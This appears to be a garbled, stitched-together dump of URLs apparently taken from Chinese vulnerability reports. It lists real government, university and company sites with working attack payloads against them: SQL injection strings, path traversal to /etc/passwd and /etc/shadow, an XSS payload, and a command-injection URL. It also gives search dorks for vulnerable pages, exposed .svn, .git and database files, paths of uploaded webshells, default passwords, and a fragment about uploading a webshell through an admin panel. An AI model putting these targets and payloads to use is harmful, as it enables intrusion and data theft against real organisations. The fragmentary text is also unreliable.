http://rctdlz.cn/ExtWebModels/LandManage/WaterManage.aspx?id= http://60.2.214.118:8088/ExtWebModels/LandManage/WaterManage.aspx?id= http://121.17.2.52/ExtWebModels/LandManage/WaterManage.aspx?id= http://61.186.154.210:8088/ExtWebModels/LandManage/WaterManage.aspx?id= http://down.chinaz.com/soft/29477.htm http://pay.pinming.cn/orderdetail.aspx?orderid=72b2b66f-44ae-4ba7-a0fd-23d0c8ec3e25 http://www.jggw.suzhou.gov.cn/BLS/IndexList.aspx?type=QuestionsType_3 http://171.8.66.196/loginAction.action http://171.8.66.196/no.jsp http://www.dysti.gov.cn/webmaste/Default.aspx#122_101 http://www.dyxcb.org/webmaste/web_Login.aspx http://dyws.dongying.gov.cn/webmaste/web_Login.aspx http://jgswj.dongying.gov.cn/webmaste/web_Login.aspx http://www.dyxcb.org/webmaste/web_Login.aspx http://www.dylzx.com/webmaste/web_Login.aspx http://www.dysti.gov.cn/webmaste/info/info_add.aspx?CatalogID=0%E2%80%98 http://222.76.206.187:97/ http://222.76.206.187:97/Uploads/DBT_SHIP/2015_03_07_09_36_56_2322_conn.aspx http://www.sxxzpta.com/admin/Login.asp http://www.sxxzpta.com/bm/admin_login.asp http://www.sxxzpta.com/bm/chax.asp?id= http://www.sxxzpta.com/bm/chengji.asp?id= http://www.sxxzpta.com/bm/chengji.asp?sfz= http://www.sxxzpta.com/bm/chengji.asp?uname= http://www.sxxzpta.com/bm/admin_chklogin.asp?xm= http://suggestion.baidu.com/su;/1.bat;?wd=&cb=calc||&sid=1440_2031_1945_1788&t=1362056239875然后它会弹出下载的页面。接着下载打开就直接执行这个了,详情还是要看看参考才行呢 http://www.tyky.com.cn http://www.sztaiji.com/ site:gov.cn http://i.xiaomi.com http://i.xiaomi.com,关闭原来的小米手机的数据通信和WiFi,并插上另外一张电话卡,假设是13343214321 http://i.xiaomi.com上发起手机响铃告警的请求。如果没什么意外,18512345678会收到如下格式的短信: http://ziliao.gaofen.com/docs/view/?area=sz&id=6461 http://www.zmjsjt.com.cn/,存在structs2命令执行漏洞,http://www.zmjsjt.com.cn/viewNewsInfo.action?newsId=1855 jdbc:oracle:thin:@192.168.200.2:1521:zmjwwdb"/ http://szhpfpc.91160.com/ http://szhpfpc.91160.com/index.php?c=account&a=mform&mid=4761121 http://www.simoire.com/jjfa/show.asp?aid=298 http://www.simoire.com/jjfa/show.asp?aid=298 http://www.simoire.com/jjfa/show.asp?aid=298 http://data.flurry.com/aas.do http://cht.citic/trc/www.travel.citic.com/route_detail.jsp http://sdb.ycgky.com:8080/SDBConsole/Login_login.action http://sdb.ycgky.com:8080/SDBConsole/wooyun.txt http://ym.tcl.com/ http://ym.tcl.com/test.php http://entuser.pipi.cn:8080/loadvote.action pipi.cn/act pipi.cn/act_stderr.log www.88488.com 88488.com/www 88488.com/www_stderr.log 88488.com/admin 88488.com/admin_stderr.log 88488.com/tuanadmin 88488.com/tuanadmin_stderr.log 88488.com/tuan 88488.com/tuanadmin_stderr.log 88488.com/tianqi 88488.com/tianqi_stderr.log pipi.cn/ent/admin pipi.cn/entadmin_tstderr.log pipi.cn/ent/user pipi.cn/entuser_tstderr.log pipi.cn/ent/admin2 pipi.cn/staradmin_tstderr.log pipi.cn/cp pipi.cn/cp_tstderr.log pipi.cn/popadmin pipi.cn/popadmin_tstderr.log pipi.cn/shop_admin2 pipi.cn/shopadmin1 pipi.cn/act2 cn:8080/根目录,请自己删除。 inurl:company.asp?title=运输线路 http://www.hztl56.com/feedback.asp http://tbt-tools.com/feedback.asp http://glennwl.com/feedback.asp http://www.agr2012.com/feedback.asp http://www.impsos.com/feedback.asp http://www.gzkmhr.com/feedback.asp http://cfyzhsky.com/feedback.asp http://www.hejinwl.com/feedback.asp http://www.560310.com/feedback.asp http://xwdhy.com/feedback.asp http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013560 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013532 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013539 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013546 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013551 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013554 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013556 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013560 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013560 http://service.haier.net:8086/defective_products/business_processing.jsp?foreign_system=aima&dealer_code=50013560 http://116.55.245.125:9200 http://116.55.245.125:9200/_search?pretty http://uestc.ctvc.tv http://uestc.ctvc.tv/listLastUploadAction.do?num=5 http://uestc.ctvc.tv/companyForUploaderAction.do http://huashi.ctvc.tv http://huashi.ctvc.tv/listLastUploadAction.do?num=5 http://uestc.ctvc.tv/ http://zjicm.ctvc.tv/ http://zju.ctvc.tv/ http://zucc.ctvc.tv/ https://licai.lianjia.com/myAccount/messageDetails?sysid=100001&type=1 http://www.pzhdqedu.gov.cn/xx/x04/index.html然后我看了看后台,恩迅时的,迅时的漏洞老掉牙了,这里就不提了,拿到以后看了下密码 http://www.xiao5u.com/Customers.html link:http://wooyun.org/bugs/wooyun-2010-065350。找到某学校网站,进入后台后 https://vpn.szairport.com http://soa.yundasys.com:30088/ydsoa/cas.login?CASLOGOUT=true http://soa.yundasys.com:30088/ydsoa/help_doc/help.html http://wenku.baidu.com/view/eb923e2f4b73f242336c5ff3.html http://124.207.179.212/netrep/ http://www.stats.gov.cn/tjsj/tjbz/xzqhdm/201401/t20140116_501070.html http://ys.oxhack.com/iospoc.html https://github.com/BichengLUO/WebGLBrush/blob/7c8888766a620305273c46a4ebaf9a362f59c63d/WebContent/WEB-INF/web.xml http://www.0769net.com/index.html http://www.yy-edu.com.cn/这个 http://www.yy-edu.com.cn/cn_asp/hudon_show.asp?id=78%27&typeid=133 http://www.yy-edu.com.cn/cn_asp/school_show.asp?id=602 http://www.yy-edu.com.cn/cn_asp/news_show.asp?id=770 http://alexa.ip138.com/ http://alexa.ip138.com/post/Get.aspx?Type=2&ParentID=%B8%CA%CB%E0%CA%A1&t=1425803112327 http://222.85.149.104:8070/ http://hd.jstv.com/djcount/counter_images/12/Heads.asp http://hd.jstv.com/djcount/counter_images/12/adminx_login.asp http://www.3454.com/aaa.rar http://www.sxu.edu.cn/yjjg/tykxyjs/ShowMessage.asp?fid=203 www.daj.suzhou.gov.cn http://www.scal.com.cn/invite2011/admin/ http://www.scal.com.cn/invite2011/admin/ http://open.apps.uc.cn/ http://open.apps.uc.cn/userinfo填好自己手机号,一会有用【用来判断回显】 http://open.apps.uc.cn/userinfo http://221.1.104.11:8011/TouchScreen/jianjie/ShowMes.aspx?id= http://221.2.171.59:8300/TouchScreen/jianjie/ShowMes.aspx?id= http://demo.inongyou.cn/TouchScreen/jianjie/ShowMes.aspx?id= http://rctdlz.cn/TouchScreen/jianjie/ShowMes.aspx?id= http://60.2.214.118:8088/TouchScreen/jianjie/ShowMes.aspx?id= http://121.17.2.52/TouchScreen/jianjie/ShowMes.aspx?id= http://61.186.154.210:8088/TouchScreen/jianjie/ShowMes.aspx?id= http://club.lenovo.com.cn/ http://club.lenovo.com.cn/lefen/gift/pub/city_name.php http://**.**.** http://businesstravel.haier.net/ http://intra.ccfsoft.com:8088/code/projects google:COPYRIGHT©2013-2014 inurl:pro.jsp http://www.shenan-sh.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.jinghongyq.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.shenan-sh.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.meiteletld.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.shbo-xun.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.kschaosheng.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.xiangyihn.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.dgsaiduolisi.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.xinzhinb.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.bjliuyi.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.yarongsh.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.jingkeleici.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=2&pid=1 http://www.shenan-sh.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.jinghongyq.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.shenan-sh.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.meiteletld.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.shbo-xun.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.kschaosheng.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.xiangyihn.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.dgsaiduolisi.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.xinzhinb.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.bjliuyi.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.yarongsh.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.jingkeleici.com/admin/fxx.jsp?action=list&sidd=1&type=1&sid=1&siddd=*&pid=1 http://www.taishinart.org.tw/chinese/3_event/detail.php?ID=541 www.baichebao.cn http://www.xmgl.org/ http://dzj.daqing.gov.cn/ http://dzj.daqing.gov.cn/plus/mytag_js.php?aid=9090 http://bbs.paojiao.com/?3 https://portal.haier.com/web/questions/questionlist http://118.145.21.211/ http://118.145.21.181/ http://wooyun.org/bugs/wooyun-2010-043520 http://m.yiqifei.com/ http://m.yiqifei.com/search.aspx?keyword=1 http://m.yiqifei.com/search.aspx?keyword=1 http://www.fw0598.com/About.Asp?ID=1 http://www.sunnyschoolsx.com/About.asp?ID=1 http://www.fjndgs.com/About.Asp?ID=16 http://www.hys98.com/About.asp?ID=1 http://www.xhflj.cn/About.asp?ID=17 http://www.smygsg.com/About.Asp?ID=5 http://www.sbxdny.com/About.asp?ID=4 http://www.china-hxgs.com/About.asp?ID=1 http://www.sys98.com/About.asp?ID=1 http://211.87.190.13:8888//k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://202.198.141.46:8088/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://59.72.151.21:1100/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://58.40.126.65/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://online.nefu.edu.cn/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://219.141.106.225/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://sync.nefu.edu.cn/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://sync.hnadl.cn/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://202.197.127.113/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://210.26.85.211/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://210.40.3.220/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://gxzy.hnadl.cn/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://211.87.190.13:8888/k4/list.aspx?type=%BB%F9%B4%A1%D1%A7%BF%C6 http://d0.xcar.com.cn:80/d0/phpinfo.php http://home.ithaier.com/techdep/login/ http://home.ithaier.com/techdep/training/ http://www.tclbusiness.com http://www.tclbusiness.com/caches/configs/right_inc.php http://www.tclbusiness.com/caches http://love.mendale.com.cn/webmaster/admin.aspx http://love.mendale.com.cn/upload/news/images/2015330330.aspx http://www.fosu.edu.cn/li/gg/part/admin/admin_login.asp http://oa.mendale.com/defaultroot/login.jsp http://portal.9797168.com/。我就随手看了下,结果发现时织梦的,又试了下默认后台,有试了下admin,admin,然后我就进入后台了,通过文件式管理上传了个大马。 http://203.187.160.217:1234/ http://202.102.41.19/uploads/ http://222.240.225.84/Login.aspx http://ttschina.com.cn:9001/jmx-console/ http://www.966009.com http://966009.com/CLIENT/newsshow/dotmap.aspx?dot_id=0215 http://58.59.144.169:81/ http://223.203.195.195:8080/common/login/memberlogin.jsp http://221.6.35.202:8089/jmx-console/ http://hb.servyou.com.cn/sug.asp?info_kind=002001 http://ywt.shenzhenair.com/../../../../../../../../../../../../etc/passwd http://zhanzhang.baidu.com http://58.57.35.3:8090/users/UserLogin.aspx http://data.earthquake.cn/data/ http://data.cmc2-cea.8800.org/login/login.jsp?psw=test&user=test http://222.223.116.105:8089/ http://113.200.222.109:8000/ url:http://mail.cr11-5.com.cn,存在sql注入漏洞,注入点http://mail.cr11-5.com.cn/znss.asp?id=1855,丢到明小子里面跑出了后台登录用户名和密码信息 http://mail.cr11-5.com.cn/Database/DataShop.mdb http://mail.cr11-5.com.cn/ylj/query.asp?action=list http://youxi21-wap.stg2.24cp.com/.svn/entries http://youxi2-wap.stg2.24cp.com/.svn/entries http://youxi3-wap.stg2.24cp.com/.svn/entries http://youxi30-wap.stg2.24cp.com/.svn/entries http://202.108.133.207/ http://duoshuo.com/info.php http://119.57.132.11 http://119.57.132.11:88/ http://a.3454.com/sh.php?k=%5C http://club.lenovo.com.cn/ http://club.lenovo.com.cn/idea/club/index.php?m=shop&c=index&f=collect&goods_id=78231246ce8711e381a446631c66a91e http://27.223.70.11/index_dep.asp hhttp://58.246.85.67:8080/ http://59.33.83.146:8081/ inurl:/admin/AdminLogin.aspx http://www.bankingassociationnt.com/网址 http://www.bankingassociationnt.com/admin/adminLogin.aspx后台 http://www.e-future.com.cn/ url:http://118.122.94.106:8080/ztejdwgs/,发现后台采用jboss应用程序。 url:http://118.122.94.106:8080/jmx-console/ http://118.122.94.106:8080/is/ http://118.122.94.106:8080/is/index.jsp http://116.113.82.132:8222/ http://221.214.117.211:7501/ http://www.hbhk.com.cn/tenpay/notify.jsp http://api.airmac au.com.mo/news/vnews_en.asp?id=A00054 http://product.7po.com/ position:absolute;width:100%;height:300%;background-color vertical-align:top Bbsurl:http://www.zhaoshang.net/forum-74-9.html http://58.57.21.146:92/View/Login.aspx http://www.101.com.tw/ http://www.han-hsien.com.tw/hhih/news_detail.php?uid=1548 filetype:xlsx http://www.nesteel.cn/cms_wz/login.jsp http://ipi.tongji.edu.cn/?action=newsdt&id=186 http://ipi.tongji.edu.cn/en/?action=teachers&class=1 http://2008.lenovo.com/.git/config http://58.50.29.86:81/login!login.jspx VERSION:1.2.3 http://www.multigold.com.cn/ http://221.6.210.35:8080/ http://www.xss8.net/?c=uAQKz http://sz.91160.com/account/health/type-healthfile.html http://saas.csm.91160.com:9800/csm-saas/healthFiles/index.action?username=13590******&pageSize=10 http://123.57.1.153:8080/homelink/view_initIndexPageForCustomer.action http://www.jztb.gov.cn/on9e.jsp http://www.jztb.gov.cn/cmd54.jsp http://www.bjtel.cn/admin_login.html http://srm.hnair.com:8082 http://down.chinaz.com/soft/26230.htm( http://www.fjtnzx.gov.cn//admin/upfile_flash.asp http://www.sxzzb.cn//admin/upfile_flash.asp http://www.dtafzx.com/dj//admin/upfile_flash.asp http://www.hbzhongshan.net/dj//admin/upfile_flash.asp http://www.fosu.edu.cn/ceie/lsdjgov//admin/upfile_flash.asp http://121.14.161.82:10003/ http://121.14.161.82:10010/ http://121.14.161.82:10010/db?action=show http://115.238.230.18:19101/ http://www.zteup.com http://59.151.17.89/zabbix/ http://zabbix.pica.com http://112.64.143.11:5050/ http://221.202.97.75/websystem.php https://test.bescar.com https://angelic.com.cn/ http://222.223.56.116 https://222.92.15.100 https://test.bescar.com/WebClient/down_file.php?filename=WebClient.exe https://test.bescar.com/WebClient/down_file.php?filename=/etc/shadow http://0745.hhly.gov.cn/admin/login.html http://images.laiyifen.com:80/themes/laiyifen2/images/css/.svn/entries http://images.laiyifen.com:80/themes/laiyifen2/images/js/.svn/entries http://touch.laiyifen.com:80/.svn/entries http://images.laiyifen.com:80/themes/laiyifen2/images/css/.svn/entries http://touch.laiyifen.com:80/media/.svn/entries http://wx.laiyifen.com:80/.svn/entries http://wx.laiyifen.com:80/html/pc/images/.svn/entries http://oim.laiyifen.com:80/info.php http://wx.laiyifen.com/info.php http://eip.laiyifen.com/oa/lyf/whln.nsf/myview?openform&count=10&view=vwPubliced%27%27%3E%22%3E%3C/title%3E%3C/textarea%3E%3C/script%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E http://laiyifen.com/index.php/product-gnotify.html http://weixin.linktech.hk/businessQueryController.do?action=goToteleChargeJsp&mid=13066612345&wxid=16dc648f-c776-4e5f-9fb0-e675caae6abf&sign=d206da41ca2ae3807090319d95da0258&openid=ojJL_jvI54OzhYWz_bnWE1BYVESs http://61.156.3.46/web/ http://121.26.194.190 http://zxxxj.tj.edu.cn/uids/,对admin等进行了登陆次数时间戳限制 http://trust-usexpress.com/showPackages/showPackagesInfo.aspx?trkNos=ZC191513530CA http://wooyun.org/bugs/wooyun-2015-0100246 http://weizhonggou.com/go/shaidan_admin/sh_show http://weizhonggou.com/wzgadmin_msgs# http://wooyun.org/bugs/wooyun-2014-088376 http://58.20.192.237:8181/ http://weizhonggou.com/member/home/useraddress http://1001f.com/Login.action http://tvs.tcl.com/front/login.jsp http://tvs.tcl.com/manager/login.jsp http://www.jit.com.cn/ http://222.160.140.29:8000/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=DE200804031229450156&department_name=市民族事务委员会&department_Type=1&title1code=12&typeDirName=年度政府信息公开工作报告 http://218.62.109.219:8000/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=8a8a8a8a2f328744012f328bd0640033&department_name=安监局%20%20&department_Type=1&title1code=12&typeDirName=年度政府信息公开工作报告 http://61.138.128.150:8080/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=AA297&department_name=吉林市畜牧业管理局&department_Type=1&title1code=12&typeDirName=年度政府信息公开工作报告 http://218.62.90.168/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=402827812c1af4a6012c20443218009c&department_name=图们市广播电视管理局&department_Type=1 http://zwgk.wangqing.gov.cn/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=4aef2fbd2c814021012c8145c6730002&department_name=汪清镇人民政府&department_Type=1 http://122.140.89.254/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=DE200812231009110359&department_name=市科技局&department_Type=1 http://218.27.147.134/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=AAB653&department_name=永吉县食品药品监督管理局&department_Type=1&title1code=13&typeDirName=年度政府信息公开工作报告 http://www.jlfm.gov.cn:8081/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=AAB182&department_name=丰满区泰山街道办事处&department_Type=1 http://218.62.86.138/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=AAB274&department_name=桦甸市财政局&department_Type=1&title1code=13&typeDirName=年度政府信息公开工作报告 http://58.244.248.90:81/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=4028816f33f8696e0133fd57e33000ca&department_name=双辽市安全生产监督管理局&department_Type=1&title1code=11&typeDirName=年度政府信息公开工作报告 http://218.62.81.171/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=AABB504&department_name=磐石市广播电影电视局&department_Type=1 http://www.ilj.gov.cn/zwdtSjgl/Directory/searchTypeDir.jsp?department_id=5a9b4f952ced360c012cedd29034000c&department_name=龙井市审计局&department_Type=1&title1code=12&typeDirName=年度政府信息公开工作报告 http://m.feiniu.com/register/forget/ https://sapp.feiniu.com/misc/GetCaptcha url:http://www.crmg-lz.com,发现存在一个注入点http://www.crmg-lz.com/struct.asp?classid=2 http://up.wps.kingsoft.com/newupdate/specialpatch/index.ini以下载更新。返回的内容: http://up.wps.kingsoft.com/newupdate/specialpatch/WPS_UpdatePatch_9.1.0.4985.exe http://jy.4000211929.com/ http://pigai.org/) http://117.79.131.110:9200/ http://static.wooyun.org/wooyun/upload/201501/182143298fb266564327c29660ba43d83df33481.png http://218.106.130.40:8080/login.asp?step=login http://booking.hnair.com:8080 system:manager kingdomdeMacBook-Pro:sqlmap http://218.58.70.195/notice/noticeDetail?pk=8797305478977 http://sqlmap.org URL:http://kan.jnnc.com/seek.aspx?classId=5¶me=%E5%8F%B2%E8%92%82%E6%96%87%C2%B7%E5%B8%83%E9%87%8C%E5%B0%94 inurl:index.php?g=Home&m=Index&a=help inurl:login http://121.41.24.243/index.php http://www.zs-safety.gov.cn/infoView.aspx?id=5407 http://www.zs-safety.gov.cn/admin/ www.hua.com http://www.lzgd.net/zt/show_ja.php http://yqdz.jlbank.com.cn/chk/forceQuit.do http://112.91.118.57/doc/page/main.asp http://61.145.199.125/webewf/Login/Login.htm http://authcenter.add.sogou-inc.com/admin/authSite.php http://authcenter.add.sogou-inc.com/admin/search.php http://www.wooyun.org http://authcenter.add.sogou-inc.com/login.php http://localhost/bagecms/index.php?r=admini/admin/create http://lib.keyanzx.org/yjlib/index.action http://yb.tccxfw.com/ http://help.u17.com/index.php?list-focus-2 http://help.u17.com/index.php?list-focus-2/**/and/**/1=1 http://help.u17.com/index.php?list-focus-2/**/and/**/1=2 http://help.u17.com/index.php?list-focus-2/**/and/**/1=2/**/union/**/select/**/*/**/from/**/mysql.user/* http://zfb.nyist.edu.cn/msgboard/index.php?current_page=1 http://e.xdf.cn/List-index-code-SAT http://www.heica.gov.cn/search/gongqiu.php?KeyWord=1 http://www.jxlife.com.cn/jxlife/web/index.jsp http://sales.jxlife.com.cn/online/shs/user/resetPwd.jsp?user_name=18781279344 http://sales.jxlife.com.cn/online/shs/user/resetPwd.jsp?user_name=t_anke@163.com&productCode=undefined&un=undefined&pn=undefined http://www.libopac.seu.edu.cn:8080/ http://www.libopac.seu.edu.cn:8080/reader/hwthau2.php http://www.libopac.seu.edu.cn:8080/reader/hwthau2.php?id=213121028 http://www.xmxz.org.cn/contView.php?id=94 http://wsbs.sc-n-tax.gov.cn/login.htm http://shiyuanhui.haier.com/if2/index.shtml http://shiyuanhui.haier.com/If/doGetWorkList/?callback=jQuery19105044096050442379_1425977446886&page=1&limit=10&cate=%E4%BA%A7%E5%93%81%E8%AE%BE%E8%AE%A1&_=1425977446887 http://www.btac.cn/dminfo.php?id=4&type=Drama http://www.ishowchina.com/user/login.html http://www1.nm.zsks.cn/ncrebm/userLogin.jsp http://www1.nm.zsks.cn/ncrebm/admin/index.jsp http://www1.nm.zsks.cn/ncrebm/findpwd.jsp http://bbs.g-bits.com/portal.php http://218.201.210.214/admin.jsp http://www.cec.zju.edu.cn/wescms/index.php http://ipe.zju.edu.cn/manage/System_main.asp http://www.gfs.zju.edu.cn/bbs/uc_server http://www.gfs.zju.edu.cn/bbs/0.php http://dqxy.zju.edu.cn/message.php?action=show&id=58%27or%20updatexml%281,concat%280x7e,%28user%28%29%29%29,0%29or%27 http://www.hongdu.com.cn:80/ www.hongdu.com.cn ip:8735,结果什么也打不开。然后想起手机联入这wifi的ip为192.168.191.2,于是在地址栏里输入192.168.191.1:8735,于是熟悉的页面出现了。。。 ip:8735/tool http://211.100.27.51/b2b/ http://pgzy.zjzs.net:8011/login.htm http://123.196.123.15/login.action http://app.91160.com/ http://down.chinaz.com/soft/22411.htm http://www.zsmm.gov.cn/book_write.asp http://www.gzah-translation.cn/newsb//book_write.asp http://www.rcsrsj.com//book_write.asp http://www.sclzzx.com/jxyj//book_write.asp http://www.nwsni.edu.cn/ywx/book_write.asp http://dzb.lszjy.com/book_write.asp http://nercar.ustb.edu.cn/sr/book_write.asp http://www.wjcqxx.com.cn/zt/zp/book_write.asp http://tiandiqj.com/book_write.asp http://www.whits.cn/qyb/book_write.asp http://www.wlyjsj.gov.cn/book_write.asp http://www.51peichang.net/book_write.asp http://www.yonghengmu.cc/book_write.asp http://jky.yctei.cn//book_write.asp http://www.cnzfcj.com//book_write.asp http://ddc.sxgy.cn//book_write.asp http://www.sztyx.com/community//book_write.asp http://www.jxhdj.com//book_write.asp http://jsjx.lmu.cn/jyfwb//book_write.asp http://www.jdtzb.gov.cn//book_write.asp www.da.shu.edu.cn http://www.da.shu.edu.cn/pub/search/default.asp?id=101 http://**.**.**/mdm/admin/ http://**.**.**/ http://223.82.246.237:8080/ivhs/ajax_updateUserInfo.action http://223.82.246.237:8080/ivhs/ajax_updateUserInfo.action jar:/usr/local/tomcat//bin/bootstrap.jar http://www.appstar.com.cn/ http://www.appstar.com.cn/appstar/manage/sysConfig.jsp http://www.siom.ac.cn/admin/tables/tab_member/detailsb.asp?txtMemberNo=2838 http://www.wlepb.gov.cn/adm/index.php http://211.160.72.5:7788/console http://www.360etou.com/hetong/11412772879/a208g.html http://61.158.142.18:9093/PeopleComHnS/login.htm http://61.158.142.18:9093/PeopleComHnS//upload/1503102022513390.jsp inurl:gb/company.asp http://www.esmmodel.com http://www.tslingerie.com http://www.hitom-china.com http://www.dkg.com.cn http://www.dg-hy.com.cn http://www.zs-jc.com http://www.hgfrp.com http://www.fl-china.com http://www.dingrunkeji.com.cn http://www.kodaoptical.com http://www.dgsanyo.com http://60.247.77.197/ http://zsjyxy.scnucas.com/system/zyjd/indexDetails.asp?Id=7 http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://www.haodai.com http://www.haodai.com/xiaofei/ http://www.haodai.com/qiye/ http://www.haodai.com/gouche/ http://www.haodai.com/goufang/ http://www.haodai.com/zixun/ http://www.haodai.com/wenda/ http://www.haodai.com http://www.haodai.com/ajax/getpasswd http://www.liangjian.com/e/e.rar http://wljx.hdu.edu.cn/eol/homepage/common/opencourse/index.jsp user:test123 password:123456 user:theol_teacher password:123456 user:theol_student password:123456 https://42.121.125.42/manage/login http://lib.sqnc.edu.cn/shownews.asp?id=851 http://www.wooyun.org/bugs/wooyun-2010-089573 http://**.**.**/ http://ms.bistu.edu.cn/wp-login.php?action=rp&key=[ms.wp_users.user_activation_key]&login=admin http://**.**.**/mweom/logon.ac http://barcode.bgp.com.cn:8090/login cn:8090 http://barcode.bgp.com.cn:8090 http://api1.fun.tv/ajax/get_mobile_vcode/电话号码/reset_password http://www.fun.tv/account/password/set?isajax=1 http://www.fun.tv/account/password/setbymobile http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://tcl.com/About/huameng_detail.html?id=256 http://kxkw.staff.xdf.cn:80/Course-suzhi-course_category_id-74* http://down.chinaz.com/soft/30300.htm inurl:showprojects.asp?id= http://xf.shidaosoloon.com/chinese/projects/showprojects.asp?ID=715 http://www.mehndimadness.com/showprojects.asp?projectid=3 http://www.dywenshi.com/showprojects.asp?id=23 http://www.qd-fm.com/showprojects.asp?i=16658 http://www.0712weixiu.com/showprojects.asp?id=21 http://www.lyyd.com//xydata/xycms.mdb http://www.lylantianjx.com//xydata/xycms.mdb http://www.lyhbsh.com//xydata/xycms.mdb http://www.sdyndcjx.com//xydata/xycms.mdb http://sdlysfs.com//xydata/xycms.mdb www.jlkxxx.com www.rtxnet.com www.lbcsw.com www.cp368.com www.sihongren.com www.wa118114.com www.mylovedz.com www.zmdbxw.com www.rtxnet.com www.qzw0595.com www.hykm888.cn www.baixinxi.com www.anji365.cn www.jieemall.com www.ooovv.com http://my.xcar.com.cn/set/address.php http://my.xcar.com.cn:80/set/address.php?action=add http://my.xcar.com.cn:80/set/account.php?action=profile http://"/ http://demo.lebi.cn/ajax/imageuploadone.aspx http://psy.ruc.edu.cn/facultyinfo.php?id=14 VERSION:1.2.3 http://zhhy.nbse.net.cn/ShipSuiteEB/login.htm http://www.venshop.com/download/ www.cccf.net.cn/center/pages/download.jsppath=center/pages/download.jsp&name=download.jsp http://www.cccf.net.cn/center/pages/download.jsp?path=centerNew/pages/complaint.jsp&name=complaint.jsp www.cccf.net.cn/getCenterIndex.do www.ptlove.net.cn/series_pro_detail.php?id=16&pid=151 http://www.bzga.gov.cn/cmcx/ http://222.240.176.99/gbs/ www.tzpolice.gov.cn/getjwj.phpop=1 http://222.190.123.50:8001/ydzf/Web/Login.htm http://222.190.123.50:8001 http://113.134.202.67:8000/ http://113.134.202.67:8000/CheckLogin.aspx http://breadtrip.com/downloads/ MD5:DA:6A:20:C1:FB:50:3A:3C:E9:BA:79:6A:5F:61:83:BD SHA1:4D:69:5F:DA:C5:FC:B2:FB:36:0E:28:2B:09:E6:94:B4:C6:92:E7:FB https://github.com/yuanchenglu/LinuxInitConfig/blob/364269f80b1f359bcd674b91bf47f4020f58f3ad/account.c http://www.cmyl.edu.hk/php/webinfo/show.php?id=2 http://www.cmyl.edu.hk/php/calendar/calendar.php?month[]=111,得到路径/home/www/kindergarten/cmyl/php/calendar/calendar.php http://www.cmyl.edu.hk/php/webinfo/fdpic.php?picpath=updatepic/uploads/20130210000952175.JPG。 